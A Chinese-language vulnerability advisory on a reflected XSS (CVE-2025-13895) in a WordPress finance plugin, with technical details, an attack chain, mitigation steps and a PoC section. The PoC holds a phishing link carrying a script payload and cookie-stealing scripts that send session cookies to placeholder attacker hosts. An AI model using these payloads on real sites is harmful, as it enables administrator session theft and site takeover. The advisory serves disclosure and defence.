CVE-2025-13895 WordPress Top Position Google Finance插件反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13895

漏洞类型

反射型XSS（跨站脚本攻击）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Top Position Google Finance插件 for WordPress

漏洞概述

CVE-2025-13895是WordPress平台Top Position Google Finance插件中的一个中危安全漏洞。该插件所有版本直至0.1.0版本均存在反射型跨站脚本（Reflected XSS）漏洞。漏洞根源在于插件直接使用`$_SERVER['PHP_SELF']`变量而未进行充分的输入验证和输出转义处理。攻击者可以构造恶意URL链接，在URL参数中嵌入JavaScript等脚本代码。当受害者点击攻击者精心构造的链接访问存在漏洞的页面时，恶意脚本将在受害者浏览器上下文中执行，从而窃取用户会话cookie、劫持用户账号或进行其他恶意操作。由于该漏洞无需认证即可利用，但需要诱导用户点击恶意链接，因此CVSS评分达到6.1分，属于中危级别。建议插件用户立即采取修复措施或使用临时缓解方案。

技术细节

该漏洞属于典型的反射型跨站脚本（Reflected XSS）漏洞。在PHP Web应用中，`$_SERVER['PHP_SELF']`变量包含当前执行脚本的路径信息，攻击者可以通过在URL路径中注入恶意脚本来利用此变量。Top Position Google Finance插件在处理用户请求时，直接将该变量输出到HTML页面而未进行适当的安全过滤。具体问题代码位于插件文件第56行和第78行附近，插件未使用WordPress提供的安全函数（如esc_url()、esc_html()、sanitize_text_field()等）对用户输入进行清理和转义。攻击者构造形如`/wp-admin/admin.php/<script>alert(document.cookie)</script>`的URL，受害者访问后，`<script>`标签将被浏览器解析执行。由于WordPress管理后台许多页面使用admin.php作为入口，攻击者可以利用此漏洞窃取管理员会话令牌，进而接管整个WordPress站点。漏洞利用复杂度低，无需认证，但需要用户交互（点击恶意链接），攻击向量为网络范围。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress Top Position Google Finance插件版本（≤0.1.0）

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的URL，利用$_SERVER['PHP_SELF']变量注入XSS payload

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他方式诱导目标用户（通常是管理员）点击恶意链接

STEP 4

步骤4

用户浏览器发送请求到目标站点的admin.php，服务器将未过滤的PHP_SELF值返回给用户浏览器

STEP 5

步骤5

用户浏览器解析HTML响应，执行注入的恶意脚本代码，窃取用户会话cookie或其他敏感信息

STEP 6

步骤6

攻击者利用窃取的会话cookie冒充管理员身份登录WordPress后台，执行进一步的攻击行为如安装后门或篡改网站内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13895 PoC: Reflected XSS in Top Position Google Finance plugin -->
<!--诱骗管理员点击以下恶意链接-->
<a href="http://target-site.com/wp-admin/admin.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E">查看财务数据</a>

<!-- 完整恶意URL示例 -->
<!-- http://vulnerable-site.com/wp-admin/admin.php/"><script>fetch('https://attacker.com/steal?c='+document.cookie)</script> -->

<!-- 自动化测试payload -->
<script>
  // Cookie窃取脚本
  var cookie = document.cookie;
  var img = new Image();
  img.src = 'https://attacker-controlled-server.com/log?cookie=' + encodeURIComponent(cookie);
</script>

影响范围

Top Position Google Finance插件 ≤ 0.1.0（所有版本）

防御指南

临时缓解措施

由于该插件开发者可能尚未发布安全更新，临时缓解措施包括：1）立即停用并删除Top Position Google Finance插件；2）如果必须使用该插件，可使用WordPress安全插件添加额外的XSS防护；3）加强对管理员账户的安全措施，如使用双因素认证；4）在Web服务器层面配置URL过滤规则，拦截包含<script>标签等常见XSS特征的请求；5）提醒管理员不要点击来源不明的链接，特别是包含特殊字符的URL；6）启用WordPress安全审计日志，监控异常的管理后台访问行为。